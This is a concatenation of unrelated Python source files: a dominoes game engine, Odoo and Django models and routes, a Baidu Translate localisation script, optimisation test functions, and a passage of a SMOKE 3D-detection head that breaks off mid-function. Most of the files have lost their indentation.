def test_parse_to_date(self):
w3 = utils.as_w3c_datetime("2016-12-12")
self.assertEqual("2016-12-11T23:00Z", w3)
w3 = utils.as_w3c_datetime("Wed, 21 Dec 2016 12:31:38 GMT")
self.assertEqual("2016-12-21T12:31:38Z", w3)
# ValueError
err = utils.as_w3c_datetime("123456789")
self.assertEqual("Error: 123456789", err)
@unittest.skip("not a test")
def test_csv_dialects(self):
print(csv.list_dialects())
# ['excel-tab', 'excel', 'unix']
# if you want the standard RFC4180 then roll your own.
|
from .parser import Parser
from .parse_result import ParseResult
from .nodes import *
|
'''
Created on 29 nov. 2019
@author: usuario
'''
from odoo import api, fields, models
class mecanico(models.Model):
_name = "upocar.mecanico"
_rec_name = "nombre_apellidos"
nombre = fields.Char("Nombre", size=32, required=True)
apellidos = fields.Char("Apellidos", size=64, required=True)
especialidad = fields.Char("Especialidad", size=64, required=True)
num_reparaciones = fields.Integer(string="Número de reparaciones", compute="_compute_num_reparaciones", store=True)
reparacion_ids = fields.Many2many("upocar.reparacion", string="Reparaciones")
taller_id = fields.Many2one("upocar.taller", string="Taller", required=True)
nombre_apellidos = fields.Char(compute="_compute_nombre_apellidos")
@api.depends("nombre", "apellidos")
def _compute_nombre_apellidos(self):
for record in self:
record.nombre_apellidos = record.nombre + " " + record.apellidos
@api.depends("reparacion_ids")
def _compute_num_reparaciones(self):
for record in self:
            # Always assign the computed field, even when there are no repairs.
            record.num_reparaciones = len(record.reparacion_ids)
|
"""A game engine for running a game of Dominos."""
import sys, random, json, time
sys.path.insert(0, '..') # For importing app config, required for using db
from dominos.Config import Config
from dominos.classes.Board import Board
from dominos.classes.Pack import Pack
from dominos.classes.Player import Player
class Engine:
def __init__(self, whisper_f=None, shout_f=None, query_f=None, **kwargs):
self.config = Config(**kwargs)
self.n_players = self.config.n_players
self.hand_size = self.config.hand_size
self.win_threshold = self.config.win_threshold
self.check_5_doubles = self.config.check_5_doubles
self.players = []
self.board = None
self.pack = None
for i in range(self.n_players):
self.players.append(Player(i))
self.current_player = None
self.n_passes = 0
        callbacks = [shout_f, whisper_f, query_f]
        if any(f is None for f in callbacks) and not all(f is None for f in callbacks):
            raise ValueError("Must specify all of the shout, whisper, and query callbacks, or omit all of them to run locally")
        self.local = shout_f is None
self.shout_f = shout_f
self.whisper_f = whisper_f
self.query_f = query_f
def run_game(self):
"""Start and run a game until completion, handling game logic as necessary."""
self.show_scores()
next_round_fresh = self.play_round(fresh_round=True)
while not self.game_is_over():
next_round_fresh = self.play_round(next_round_fresh)
scores = self.get_scores(indexed=False)
winner = scores.index(max(scores))
self.shout("Game is over!\n\nPlayer {} wins!".format(winner))
self.shout("", "game_over")
return winner
def play_round(self, fresh_round=False):
self.board = Board()
self.draw_hands(fresh_round)
self.shout("", "clear_board")
if fresh_round:
self.current_player = self.determine_first_player()
blocked = False
play_fresh = fresh_round
while self.players_have_dominos() and not blocked and not self.game_is_over():
blocked = self.play_turn(play_fresh)
self.next_turn()
self.show_scores()
play_fresh = False
if not self.players_have_dominos():
# Reverse current player switch
self.current_player = (self.current_player + self.n_players - 1) % self.n_players
self.players[self.current_player].add_points(self.get_value_on_domino(self.current_player))
print(f"Player {self.current_player} dominoed!")
self.show_scores()
return False
elif blocked:
print("Game blocked!")
blocked_scorer, points = self.get_blocked_result()
if blocked_scorer is not None:
print(f"Player {blocked_scorer} scores {points}")
self.players[blocked_scorer].add_points(points)
self.show_scores()
return True
else: # Game is over
return False
def play_turn(self, play_fresh=False):
domino, direction = self.query_move(self.current_player, play_fresh)
if domino is not None:
self.board.add_domino(domino, direction)
if not self.local:
self.shout(json.dumps(self.get_placement_rep(domino, direction)), "add_domino")
time.sleep(0)
self.players[self.current_player].remove_domino(domino)
self.whisper(self.players[self.current_player].get_hand_JSON(), self.current_player, "hand")
score = self.board.score_board()
self.players[self.current_player].add_points(score)
self.n_passes = 0
else: # Player passes
self.n_passes += 1
if self.n_passes == self.n_players:
return True
print(self.board)
return False
def next_turn(self) -> None:
"""Update the player to move."""
self.current_player = (self.current_player + 1) % self.n_players
def draw_hands(self, fresh_round=False):
while True:
self.pack = Pack()
hands = []
for i in range(self.n_players):
hands.append(self.pack.pull(self.hand_size))
if self.verify_hands(hands, check_any_double=fresh_round,
check_5_doubles=self.check_5_doubles):
for i in range(self.n_players):
self.players[i].assign_hand(hands[i])
self.whisper(self.players[i].get_hand_JSON(), i, "hand")
return
def verify_hands(self, hands, check_5_doubles=True, check_any_double=False):
if not check_5_doubles and not check_any_double:
return True
# Check that no hand has 5 doubles
no_doubles = True
for hand in hands:
n_doubles = len([d for d in hand if d.is_double()])
if check_5_doubles:
if n_doubles >= 5:
return False
if n_doubles > 0:
no_doubles = False
# Check that some hand has a double
if check_any_double:
if no_doubles:
return False
return True
def determine_first_player(self):
"""Determine who has the largest double, and thus who will play first.
Assumes each player's hand is assigned and a double exists among them."""
for i in range(6, -1, -1):
for p in range(self.n_players):
for d in self.players[p].get_hand():
if d.equals(i, i):
return p
        raise Exception("Could not find a double in the players' hands")
def players_have_dominos(self):
return min([len(p.get_hand()) for p in self.players]) > 0
def game_is_over(self):
return max(self.get_scores(indexed=False)) >= self.win_threshold
def get_scores(self, indexed=True):
if indexed:
return {i: self.get_player_score(i) for i in range(len(self.players))}
else:
return [self.get_player_score(i) for i in range(len(self.players))]
def get_player_score(self, player):
return self.players[player].get_score()
def query_move(self, player, play_fresh=False):
while True:
possible_placements = self.board.get_valid_placements_for_hand(self.players[player].get_hand(), play_fresh)
pretty_placements = [(x[0], str(x[1]), x[2]) for x in possible_placements]
print("Possible placements:")
for el in pretty_placements:
print(" --- " + str(el))
if not self.local:
playable_dominos = [i for i in range(len(pretty_placements)) if len(pretty_placements[i][2]) > 0]
self.whisper(str(playable_dominos), player, "playable_dominos")
move_possible = any([len(t[-1]) > 0 for t in possible_placements])
if move_possible:
try:
query_msg = f"Player {player}, what domino do you select?\n"
if self.local:
domino_index = int(input(query_msg).strip())
else:
self.whisper(query_msg, player, "prompt")
response = self.get_response(player)
domino_index = int(response)
if not (0 <= domino_index < len(possible_placements)) or len(possible_placements[domino_index][-1]) == 0:
self.whisper("Invalid domino choice: " + str(domino_index), player, "error")
else:
domino = possible_placements[domino_index][1]
if len(possible_placements[domino_index][-1]) == 1:
direction = possible_placements[domino_index][-1][0]
return domino, direction
else:
while True:
query_msg = f"Player {player}, what direction do you select?\n"
if self.local:
direction = input(query_msg).strip()
else:
self.whisper(query_msg, player, "prompt")
response = self.get_response(player)
direction = response.strip().upper()
if direction not in possible_placements[domino_index][-1]:
self.whisper("Invalid direction: " + direction, player, "error")
else:
return domino, direction
except Exception as e:
self.whisper("Invalid input, try again", player, "error")
else:
pulled = self.pack.pull()
query_msg = f"Player {player}, you have no valid moves. Send a blank input to pull\n"
if self.local:
_ = input(query_msg)
else:
self.whisper(query_msg, player, "prompt")
_ = self.get_response(player)
if pulled is not None:
self.players[player].add_domino(pulled)
self.whisper(self.players[player].get_hand_JSON(), player, "hand")
else:
self.shout("Pack is empty, cannot pull. Skipping turn")
return None, None
def get_value_on_domino(self, player):
"""Get the value of a 'Domino' by a player, i.e. the sum, rounded to the
nearest 5, of the other players' hand totals."""
total = sum([p.hand_total() for i, p in enumerate(self.players) if i != player])
if total % 5 > 2:
total += (5 - (total % 5))
else:
total -= total % 5
return total
def get_blocked_result(self):
"""Find the player (if any) that wins points when the game is blocked and return
that player and the points they receive."""
totals = [p.hand_total() for p in self.players]
print("Totals:", {i: totals[i] for i in range(len(totals))})
if len([t for t in totals if t == min(totals)]) > 1:
# Multiple players have lowest count, so nobody gets points
return None, 0
else:
# Find the player with minimum score and the sum of the other players' hands, rounded to the nearest 5
scorer = totals.index(min(totals))
total = sum(totals) - min(totals)
if total % 5 > 2:
total += (5 - (total % 5))
else:
total -= total % 5
return scorer, total
def get_placement_rep(self, domino, direction):
rendered_position = self.board.get_rendered_position(domino, direction)
return {
"face1": domino.head(),
"face2": domino.tail(),
"face1loc": rendered_position["1"],
"face2loc": rendered_position["2"]
}
def show_scores(self):
print("Scores:", self.get_scores())
if not self.local:
self.shout(self.get_scores(), "scores")
def get_response(self, player : int, print_wait : bool = False) -> str:
"""Query server for a response."""
# if self._config.verbose:
# if print_wait:
# print("Waiting for a response from player {}...".format(player))
while True:
# if self.is_local_ai(player):
# response = self.local_ai_responses[player]
# else:
# response = self.query_f(player)
response = self.query_f(player)
if response == "No response":
time.sleep(0.01)
# time.sleep(self._config.engine_sleep_duration)
continue
elif response is not None:
return response
else:
assert False
def whisper(self, msg, player, tag=None):
print(player, ":", msg)
if not self.local:
self.whisper_f(msg, player, tag)
def shout(self, msg, tag=None):
print(msg)
if not self.local:
self.shout_f(msg, tag)
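# --- Hedged sketch (not part of the original engine) -------------------------
# "Networked" mode just means supplying all three callbacks; the placeholders
# below illustrate the expected signatures and stand in for a real transport
# layer (names are illustrative, not project APIs).
#
#   def my_shout(msg, tag=None): ...            # broadcast to every player
#   def my_whisper(msg, player, tag=None): ...  # send to a single player
#   def my_query(player): ...                   # poll that player's response
#
#   Engine(whisper_f=my_whisper, shout_f=my_shout, query_f=my_query).run_game()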
if __name__ == "__main__":
e = Engine()
winner = e.run_game()
|
from Vintageous import PluginLogger
import sublime
import os
_logger = PluginLogger(__name__)
class DotFile(object):
def __init__(self, path):
self.path = path
@staticmethod
def from_user():
path = os.path.join(sublime.packages_path(), 'User', '.vintageousrc')
return DotFile(path)
def run(self):
try:
with open(self.path, 'r') as f:
for line in f:
cmd, args = self.parse(line)
if cmd:
_logger.info('[DotFile] running: {0} {1}'.format(cmd, args))
sublime.active_window().run_command(cmd, args)
except FileNotFoundError:
pass
def parse(self, line):
try:
_logger.info('[DotFile] parsing line: {0}'.format(line))
if line.startswith((':map ')):
line = line[1:]
return ('ex_map', {'command_line': line.rstrip()})
if line.startswith((':omap ')):
line = line[len(':omap '):]
return ('ex_omap', {'cmd': line.rstrip()})
if line.startswith((':vmap ')):
line = line[len(':vmap '):]
return ('ex_vmap', {'cmd': line.rstrip()})
if line.startswith((':let ')):
line = line[1:]
return ('ex_let', {'command_line': line.strip()})
except Exception:
print('Vintageous: bad config in dotfile: "%s"' % line.rstrip())
            _logger.debug('bad config in dotfile: "%s"', line.rstrip())
return None, None
|
# Generated by Django 2.0.4 on 2018-06-19 01:41
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
('address', models.CharField(max_length=256)),
('city', models.CharField(max_length=256)),
('state', models.CharField(max_length=256)),
('start_date', models.CharField(max_length=256)),
('start_time', models.CharField(max_length=256)),
('end_date', models.CharField(max_length=100)),
('end_time', models.CharField(max_length=256)),
('image', models.ImageField(blank=True, null=True, upload_to='events/')),
('description', models.TextField()),
('code', models.CharField(max_length=256)),
],
),
]
|
from abc import ABCMeta, abstractmethod
from ..helpers import shell_helper
class AbstractResource(object):
__metaclass__ = ABCMeta
AFTER_TASKS_KEY = 'after_tasks'
@abstractmethod
def __init__(self, properties, global_variables=None):
self.properties = properties
self.global_variables = global_variables
self.name = properties['name']
self.action = properties.get('action', None)
self.sudo = properties.get('sudo', None)
self.after_tasks = properties.get('after_tasks', None)
@property
def properties(self):
return self.__properties
@properties.setter
def properties(self, properties):
self.__properties = properties
@property
def name(self):
return self.__name
@name.setter
def name(self, name):
self.__name = name
@property
def action(self):
return self.__action
@action.setter
def action(self, action):
self.__action = action
@property
def sudo(self):
return self.__sudo
@sudo.setter
def sudo(self, sudo):
self.__sudo = sudo
@property
def global_variables(self):
return self.__global_variables
@global_variables.setter
def global_variables(self, global_variables):
self.__global_variables = global_variables
@property
def after_tasks(self):
return self.__after_tasks
@after_tasks.setter
def after_tasks(self, after_tasks):
self.__after_tasks = after_tasks
@abstractmethod
def run(self):
pass
# check if sudo is enabled
def is_sudo_enabled(self):
# if self.sudo exists, it overwrites the global variable
if self.sudo is True or self.sudo is False:
return self.sudo
return True if self.global_variables and self.global_variables.is_sudo_enabled() is True else False
# run the shell command and print the output if is in debug mode
def _run_shell_command(self, command):
# determine sudo
sudo = 'sudo ' if self.is_sudo_enabled() is True else ''
output = shell_helper.ShellHelper.run_command(sudo + command)
if self.global_variables and self.global_variables.is_debug_mode() is True:
print('* Running: ' + command)
if output:
print('** Output: ')
print(output)
# make sure there is no whitespace in the output
return output.strip()
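# Hedged sketch (illustrative only; not one of the project's real resources): a concrete
# resource calls the abstract __init__ for the shared bookkeeping and implements run(),
# usually via _run_shell_command(). The 'echo' command here is just a placeholder.
class EchoResource(AbstractResource):
    def __init__(self, properties, global_variables=None):
        super(EchoResource, self).__init__(properties, global_variables)

    def run(self):
        # Runs "echo <name>" (with sudo if enabled) and returns the stripped output.
        return self._run_shell_command('echo ' + self.name)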
|
import math
import numpy as np
import statsmodels.api as stat
from scipy import stats
from matplotlib import pyplot as plt
#Question 1
alpha = 0
theta = 0
beta = 0.015
sigma_u = 0.053
sigma_v = 0.044
rho = -0.2 #-0.2 #-0.5
sigma_uv = rho*sigma_u*sigma_v
mean = [0, 0]
cov = [[sigma_u**2, sigma_uv], [sigma_uv, sigma_v**2]]
def reg(Y, X):
    # Fit the OLS model once and return its parameters, t-values and p-values.
    X = stat.add_constant(X)
    fit = stat.OLS(Y, X).fit()
    return [fit.params, fit.tvalues, fit.pvalues]
R=10
avg_beta = np.zeros(R)
fivepc_beta = np.zeros(R)
nnfivepc_beta = np.zeros(R)
Tau=120
for T in range(Tau,Tau*(R+1),Tau):
B=250
estAlpha = np.zeros(B)
estBeta = np.zeros(B)
tAlpha = np.zeros(B)
tBeta = np.zeros(B)
pAlpha = np.zeros(B)
pBeta = np.zeros(B)
for i in range(1,B+1):
uv=np.random.multivariate_normal(mean, cov, (T+1))
x=np.zeros(T+1)
for t in range(1,T+1):
x[t]= theta+ rho*x[t-1]+uv[t,1]
r = alpha +beta *x[0:T-1]+uv[1:T,0]
Z = x[0:T-1]
temp = reg(r,Z)
estAlpha[i-1] = temp[0][0]
estBeta[i-1] = temp[0][1]
tAlpha[i-1] = temp[1][0]
tBeta[i-1] = temp[1][1]
pAlpha[i-1] = temp[2][0]
pBeta[i-1] = temp[2][1]
tt=int(T/Tau)
avg_beta[tt-1] = np.average(estBeta)
fivepc_beta[tt-1] = np.percentile(estBeta,5)
nnfivepc_beta[tt-1] = np.percentile(estBeta,95)
plt.plot(range(Tau,Tau*(R+1),Tau), avg_beta)
plt.plot(range(Tau,Tau*(R+1),Tau), fivepc_beta)
plt.plot(range(Tau,Tau*(R+1),Tau), nnfivepc_beta)
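# Added for readability (hedged: the labels are descriptive guesses based on the code above):
# render the three beta curves with axis labels and a legend.
plt.xlabel('sample size T')
plt.ylabel('estimated beta')
plt.legend(['mean', '5th percentile', '95th percentile'])
plt.show()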
|
"""
Hash table - example
"""
import ads_02_00_DB as DB
from B_Data_Structures.hashtable import HashTable
#ht.HashTable.SIZE = 20
def main():
agenda = HashTable()
print(agenda)
print()
for user in DB.user_to_add:
if agenda.insert(user[0], user):
print("User was added")
else:
print("User already has this key registered")
agenda.insert(0, "Teste1")
agenda.insert(10, "Teste2")
agenda.insert(11, "Teste3")
print()
print(agenda.get(0))
print(agenda.get("oscar@gmail.com"))
print(agenda.get("John"))
print()
print(agenda)
if __name__ == "__main__":
main()
print("Done!!")
|
###########################################################################
###########################################################################
##################TEST FUNCTION############################################
###########################################################################
###########################################################################
import numpy as np
import matplotlib.pyplot as plt
import scipy
def schwefel(x,arr,brr):
x = x.astype(float)
return 418.9829*len(x) - np.sum(x*np.sin(np.sqrt(np.abs(x))))
###########################################################################
def schwefel_gradient(x,*args):
x = x.astype(float)
indices = np.where(x==0)
x[indices] = 0.0001
return -(np.sin(np.sqrt(np.abs(x))) + (x*np.cos(np.sqrt(np.abs(x)))*(0.5/np.sqrt(np.abs(x))) * (np.sign(x))))
###########################################################################
def schwefel_hessian(x,*args):
x = x.astype(float)
e = 1e-4
hessian = np.zeros((len(x),len(x)))
for i in range(len(hessian)):
x_aux1 = np.array(x)
x_aux1[i] = x[i] + e
x_aux2 = np.array(x)
x_aux2[i] = x[i] - e
a = (((schwefel_gradient(x_aux1,args) - schwefel_gradient(x_aux2,args))/(2.0*e)))
hessian[i,i] = a[i]
return hessian
###########################################################################
def non_diff(x):
p = np.array([2,2])
if np.linalg.norm(np.subtract(p,x))<1.0: return -1.0
else: return 0.0
###########################################################################
def non_diff_grad(x):
return np.zeros((len(x)))
###########################################################################
def non_diff_hess(x):
return np.zeros((len(x),len(x)))
###########################################################################
def plot_schwefel(bounds = [[-500,500],[-500,500]], resolution = 100, points = None, deflation_points = None):
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
X = np.linspace(bounds[0][0], bounds[0][1], resolution)
Y = np.linspace(bounds[1][0], bounds[1][1], resolution)
X, Y = np.meshgrid(X, Y)
    Z = np.empty(X.shape)
    gr = np.empty(X.shape)
    for i in range(len(X)):
        for j in range(len(Y)):
            Z[i, j] = schwefel(np.array([X[i, j], Y[i, j]]), None, None)
            if deflation_points is not None:
                # NOTE: deflation_function is assumed to be provided elsewhere; it is not defined in this module.
                gr[i, j] = schwefel_gradient(np.array([X[i, j], Y[i, j]]))[0] * deflation_function(np.array([[X[i, j], Y[i, j]]]), deflation_points)
                #gr[i,j] = deflation_function(np.array([[X[i,j],Y[i,j]]]), deflation_points)
    fig = plt.figure(0)
    a = plt.pcolormesh(X, Y, Z, cmap=cm.viridis)
plt.colorbar(a)
if points is not None: plt.scatter(points[:,0], points[:,1])
    if deflation_points is not None and len(deflation_points) != 0: plt.scatter(deflation_points[:,0], deflation_points[:,1])
plt.show()
###########################################################################
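###########################################################################
# Hedged sketch (not part of the original test module): the functions above are
# intended to be handed to an optimizer. A quick local run with scipy, using an
# illustrative starting point:
if __name__ == "__main__":
    from scipy import optimize
    x0 = np.array([350.0, 350.0])
    res = optimize.minimize(schwefel, x0, args=(None, None),
                            jac=lambda x, *a: schwefel_gradient(x),
                            method="BFGS")
    print("local minimum found at", res.x, "with value", res.fun)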
|
from django.contrib import admin
from .models import DepartmentInfo, Designation, ExtraInfo, Faculty, Staff, HoldsDesignation
# Register your models here.
admin.site.register(ExtraInfo)
admin.site.register(Staff)
admin.site.register(Faculty)
admin.site.register(DepartmentInfo)
admin.site.register(Designation)
admin.site.register(HoldsDesignation)
|
a = int(input('digite el primer nro '))
b = int(input('digite el segundo nro '))
if a == b:
print('SON IGUALES')
|
#!/usr/bin/python
#-*- coding:utf-8 -*-
# Baidu Translate API documentation: http://api.fanyi.baidu.com/api/trans/product/apidoc
import httplib
import md5
import urllib
import random
import re
import json
import os
import sys
kBaiduAppID = 'Please generate from your Baidu developer center' # AppID obtained from the Baidu developer console
kBaiduSecretKey = 'Please generate from your Baidu developer center' # SecretKey obtained from the Baidu developer console
gStringsFileName = ''
gStringsKeyList = []
gStringsValueList = []
gAllSupportedLangList = ['auto', 'zh', 'en', 'yue', 'wyw', 'jp', 'kor', 'fra', 'spa', 'th', 'ara', 'ru', 'pt', 'de', 'it', 'el', 'nl', 'pl', 'bul', 'est', 'dan', 'fin', 'cs', 'rom', 'slo', 'swe', 'hu', 'cht', 'vie']
reload(sys)
sys.setdefaultencoding( "utf-8" )
def initStringsKeyValueFromFile(fileName):
global gStringsFileName
global gStringsKeyList
global gStringsValueList
gStringsFileName = fileName
try:
f = open(fileName, 'r')
lines = f.readlines()
except IOError as e:
print e
else:
for line in lines:
match = re.search(r'"(?P<key>.*?)" = "(?P<value>.*?)"', line)
if match:
gStringsKeyList.append(match.group('key'))
gStringsValueList.append(match.group('value'))
else:
                # Preserve comments and blank lines so they carry over to the new translation file
gStringsKeyList.append(line)
gStringsValueList.append('')
finally:
f.close()
def translateToLanguageList(fromLang, toLangs):
if fromLang not in gAllSupportedLangList:
        print fromLang + ' is not supported'
return
for toLang in toLangs:
if toLang not in gAllSupportedLangList:
            print toLang + ' is not supported'
break
translateToLang(fromLang, toLang)
def translateToLang(fromLang, toLang):
httpClient = None
myurl = '/api/trans/vip/translate'
httpClient = httplib.HTTPConnection('api.fanyi.baidu.com')
extension = os.path.splitext(gStringsFileName)[1]
toFileName = gStringsFileName.replace(extension, '_' + toLang + extension)
    toFile = open(toFileName, 'w')
print 'Translating ' + toLang + ' to fileName: ' + toFileName
for index,val in enumerate(gStringsValueList):
q = val
if q:
salt = random.randint(32768, 65536)
sign = kBaiduAppID + q + str(salt) + kBaiduSecretKey
m1 = md5.new()
m1.update(sign)
sign = m1.hexdigest()
            # Build a fresh request URL each iteration; appending to myurl itself would accumulate query strings across requests.
            requestUrl = myurl + '?appid=' + kBaiduAppID + '&q=' + urllib.quote(q) + '&from=' + fromLang + '&to=' + toLang + '&salt=' + str(salt) + '&sign=' + sign
            try:
                httpClient.request('GET', requestUrl)
                # response is an httplib.HTTPResponse object
                response = httpClient.getresponse()
jsonData = json.loads(response.read())
dst = jsonData['trans_result'][0]['dst']
result = '"' + gStringsKeyList[index] + '" = "' + dst + '";\n'
toFile.write(result)
except Exception, e:
print e
else:
            # No translation needed: write the original key line (comment or blank line) unchanged
toFile.write(gStringsKeyList[index])
if httpClient:
httpClient.close()
if toFile:
toFile.close()
print 'Finished translating to ' + toLang
fileName = raw_input('Enter a fileName: ')
initStringsKeyValueFromFile(fileName)
print 'Supports languages:'
print gAllSupportedLangList
fromLang = raw_input('Enter from language: ')
toLangs = raw_input('Enter to language list, split by space: ')
print 'Start'
translateToLanguageList(fromLang, toLangs.split())
print 'All done!'
|
from core.framework.module import FridaModule
class Module(FridaModule):
meta = {
'name': 'Title',
'author': '@AUTHOR (@MWRLabs)',
'description': 'Description',
'options': (
),
}
# ==================================================================================================================
# UTILS
# ==================================================================================================================
# ==================================================================================================================
# RUN
# ==================================================================================================================
def module_run(self):
pass
|
from django.urls import path
from .views import teacher as teacher_view
from .views import student as student_view
from .views import notification as notification_view
from .views import common as common_view
from .views import statistics as statistics_view
urlpatterns = [
path('', common_view.index, name='index'),
path('find-task/<int:task_id>/<str:login>/', student_view.find_task_detail, name='find_task_detail'),
path('task/<int:assignment_id>/<str:login>/', student_view.task_detail, name='task_detail'),
path('task/<int:assignment_id>/<str:login>/<int:submit_num>/', student_view.task_detail, name='task_detail'),
path('task/<int:assignment_id>/<str:login>/<int:submit_a>-<int:submit_b>.diff', student_view.submit_diff, name='submits_diff'),
path('task/<int:assignment_id>/<str:login>/<int:submit_num>/download', student_view.submit_download, name='submit_download'),
path('task/<int:assignment_id>/<str:login>/<int:submit_num>/comments', student_view.submit_comments, name='submit_comments'),
path('task/<int:assignment_id>/<str:login>/<int:submit_num>/result', student_view.upload_results),
path('task/<path:task_name>/asset/<path:path>', student_view.task_asset, name='task_asset'),
path('task/<path:task_name>/tests/<str:test_name>/<str:file>', student_view.raw_test_content, name='raw_test_content'),
path('task/<path:task_name>.tar.gz', student_view.tar_test_data, name='tar_test_data'),
path('result/<int:submit_id>/<str:test_name>/<str:result_type>/<str:file>', student_view.raw_result_content, name='raw_result_content'),
path('submit/<int:submit_id>/source/<path:path>', student_view.submit_source, name='submit_source'),
path('submit/<int:submit_id>/pipeline', student_view.pipeline_status),
# notifications
path('notification/all', notification_view.all_notifications),
path('notification/mark_as_read', notification_view.mark_as_read),
path('notification/mark_as_read/<int:notification_id>', notification_view.mark_as_read),
# teacher
path('teacher/task/<int:task_id>', teacher_view.teacher_task, name='teacher_task'),
path('teacher/task/<int:task_id>.tar', student_view.teacher_task_tar, name='teacher_task_tar'),
path('teacher/task/<int:task_id>/moss', teacher_view.teacher_task_moss_check, name='teacher_task_moss_check'),
path('submits', teacher_view.submits, name='submits'),
path('submits/<str:student_username>', teacher_view.submits, name='submits'),
path('statistics/task/<int:task_id>', statistics_view.for_task, name='task_stats'),
path('statistics/assignment/<int:assignment_id>', statistics_view.for_assignment, name='assignment'),
path('assignment/download/<int:assignment_id>', teacher_view.download_assignment_submits, name='download_assignment_submits'),
path('assignment/download/<int:assignment_id>/csv', teacher_view.download_csv_per_task, name='download_csv_per_task'),
path('assignment/show/<int:assignment_id>', teacher_view.show_assignment_submits, name='show_assignment_submits'),
path('task/show/<int:task_id>', teacher_view.show_task_submits, name='show_task_submits'),
path('submit/<int:submit_id>/points', teacher_view.submit_assign_points, name='submit_assign_points'),
path('class/download/<int:class_id>/csv', teacher_view.download_csv_per_class, name='download_csv_per_class'),
path('tasks', teacher_view.all_tasks, name='tasks'),
path('tasks/<str:subject__abbr>', teacher_view.all_tasks, name='tasks'),
path('reevaluate/<int:submit_id>', teacher_view.reevaluate, name='reevaluate'),
path('import', teacher_view.bulk_import),
path('api_token', common_view.api_token),
]
|
import torch
from torch.nn import functional as F
import torch.nn as nn
import math
from ..model_utils.weight_process import _fill_fc_weights, _HEAD_NORM_SPECS
from ..model_utils.center_based_utils import sigmoid_hm, select_point_of_interest, nms_hm, select_topk
def get_channel_spec(reg_channels, name):
if name == "dim":
s = sum(reg_channels[:2])
e = sum(reg_channels[:3])
elif name == "ori":
s = sum(reg_channels[:3])
e = sum(reg_channels)
return slice(s, e, 1)
class SMOKEPredictor(nn.Module):
def __init__(self, heads, in_channels):
super(SMOKEPredictor, self).__init__()
classes = len(heads["class"])
regression = heads["reg"]
regression_channels = heads["reg_c"]
head_conv = 256
norm_func = _HEAD_NORM_SPECS[heads["norm"]]
assert sum(regression_channels) == regression, \
"the sum of {} must be equal to regression channel of {}".format(
regression, regression_channels
)
self.dim_channel = get_channel_spec(regression_channels, name="dim")
self.ori_channel = get_channel_spec(regression_channels, name="ori")
self.class_head = nn.Sequential(
nn.Conv2d(in_channels,
head_conv,
kernel_size=3,
padding=1,
bias=True),
norm_func(head_conv),
nn.ReLU(inplace=True),
nn.Conv2d(head_conv,
classes,
kernel_size=1,
padding=1 // 2,
bias=True)
)
# todo: what is datafill here
self.class_head[-1].bias.data.fill_(-2.19)
self.regression_head = nn.Sequential(
nn.Conv2d(in_channels,
head_conv,
kernel_size=3,
padding=1,
bias=True),
norm_func(head_conv),
nn.ReLU(inplace=True),
nn.Conv2d(head_conv,
regression,
kernel_size=1,
padding=1 // 2,
bias=True)
)
_fill_fc_weights(self.regression_head)
def forward(self, features):
head_class = self.class_head(features)
head_regression = self.regression_head(features)
head_class = sigmoid_hm(head_class)
# (N, C, H, W)
offset_dims = head_regression[:, self.dim_channel, ...].clone()
head_regression[:, self.dim_channel, ...] = torch.sigmoid(offset_dims) - 0.5
vector_ori = head_regression[:, self.ori_channel, ...].clone()
head_regression[:, self.ori_channel, ...] = F.normalize(vector_ori)
return [head_class, head_regression]
class SMOKECoder():
def __init__(self, depth_ref, dim_ref, device="cuda"):
self.depth_ref = torch.as_tensor(depth_ref).to(device=device)
self.dim_ref = torch.as_tensor(dim_ref).to(device=device)
def encode_box2d(self, K, rotys, dims, locs, img_size):
device = rotys.device
K = K.to(device=device)
img_size = img_size.flatten()
box3d = self.encode_box3d(rotys, dims, locs)
N = box3d.shape[0]
batch_size = rotys.shape[0]
K = K.type(box3d.type())
K = K.repeat(N//batch_size, 1, 1).view(-1, 3, 3)
box3d_image = torch.matmul(K, box3d)
box3d_image = box3d_image[:, :2, :] / box3d_image[:, 2, :].view(
box3d.shape[0], 1, box3d.shape[2]
)
xmins, _ = box3d_image[:, 0, :].min(dim=1)
xmaxs, _ = box3d_image[:, 0, :].max(dim=1)
ymins, _ = box3d_image[:, 1, :].min(dim=1)
ymaxs, _ = box3d_image[:, 1, :].max(dim=1)
xmins = xmins.clamp(0, img_size[0])
xmaxs = xmaxs.clamp(0, img_size[0])
ymins = ymins.clamp(0, img_size[1])
ymaxs = ymaxs.clamp(0, img_size[1])
bboxfrom3d = torch.cat((xmins.unsqueeze(1), ymins.unsqueeze(1),
xmaxs.unsqueeze(1), ymaxs.unsqueeze(1)), dim=1)
return bboxfrom3d
@staticmethod
def rad_to_matrix(rotys, N):
device = rotys.device
cos, sin = rotys.cos(), rotys.sin()
i_temp = torch.tensor([[1, 0, 1],
[0, 1, 0],
[-1, 0, 1]]).to(dtype=torch.float32,
device=device)
ry = i_temp.repeat(N, 1).view(N, -1, 3)
ry[:, 0, 0] *= cos.squeeze()
ry[:, 0, 2] *= sin.squeeze()
ry[:, 2, 0] *= sin.squeeze()
ry[:, 2, 2] *= cos.squeeze()
return ry
def encode_box3d(self, rotys, dims, locs):
'''
construct 3d bounding box for each object.
Args:
rotys: rotation in shape N
dims: dimensions of objects
locs: locations of objects
Returns:
'''
rotys = rotys.view(-1, 1)
dims = dims.view(-1, 3)
locs = locs.view(-1, 3)
device = rotys.device
N = rotys.shape[0]
ry = self.rad_to_matrix(rotys, N)
dims = dims.view(-1, 1).repeat(1, 8)
dims[::3, :4], dims[2::3, :4] = 0.5 * dims[::3, :4], 0.5 * dims[2::3, :4]
dims[::3, 4:], dims[2::3, 4:] = -0.5 * dims[::3, 4:], -0.5 * dims[2::3, 4:]
dims[1::3, :4], dims[1::3, 4:] = 0., -dims[1::3, 4:]
index = torch.tensor([[4, 0, 1, 2, 3, 5, 6, 7],
[4, 5, 0, 1, 6, 7, 2, 3],
[4, 5, 6, 0, 1, 2, 3, 7]]).repeat(N, 1).to(device=device)
box_3d_object = torch.gather(dims, 1, index)
box_3d = torch.matmul(ry, box_3d_object.view(N, 3, -1))
box_3d += locs.unsqueeze(-1).repeat(1, 1, 8)
return box_3d
def decode_depth(self, depths_offset):
'''
Transform depth offset to depth
'''
device = depths_offset.device
self.depth_ref[0] = self.depth_ref[0].to(device=device)
self.depth_ref[1] = self.depth_ref[1].to(device=device)
depth = depths_offset * self.depth_ref[1] + self.depth_ref[0]
return depth
def decode_location(self,
points,
points_offset,
